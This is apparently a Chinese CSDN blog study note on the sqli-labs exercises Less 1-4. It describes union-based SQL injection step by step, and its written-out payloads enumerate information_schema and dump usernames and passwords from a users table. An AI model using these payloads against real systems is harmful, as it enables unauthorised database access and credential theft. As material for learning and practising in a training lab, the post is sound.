SQL注入初级less1-4 DAY3

本文详细介绍了SQL注入的步骤,包括寻找参数、判断数据类型、闭合方式验证、利用OrderBy和Union查询获取列数和数据库信息、暴库名、暴表名及内容。讲解了如何通过闭合方式、联合查询和信息聚合函数来实施攻击,并展示了如何从数据库中提取username和password。
摘要由CSDN通过智能技术生成

注:sql注入less1-4仅仅闭合方式不一样,以第一种为例哈

sql高阶后续会更新哈,后续所有实验会配图解

步骤一:先找参数,一般id=[参数]

步骤二:在参数后加\来报错,找出类型,一般有:' " ') ") ')) ")) )) + 没有闭合

一般看1\ 后面的内容

步骤三:验证闭合,找出闭合后,后面加--+进行验证。

步骤四:通过order by  【参数】    通过二分法来找列的数目,然后找出limit 0,1,2.....参数 

步骤五:通过union联合查询,在id的数字前加 -  报错使后面的句子成立,例如 :id=-2 union select 1,2,3 --+会出现报错位 

 

步骤六:将报错位通过database()来查看库名(暴库名)

步骤七:暴表名 ,将security中的表名显示出来

步骤八:将表users里面的内容显示

id=-2 加闭合方式 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

               发现:id username,password

步骤九:将username和password显示

id=-2加闭合方式 union select 1,group_concat(username),group_concat(password) from users --+ 

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值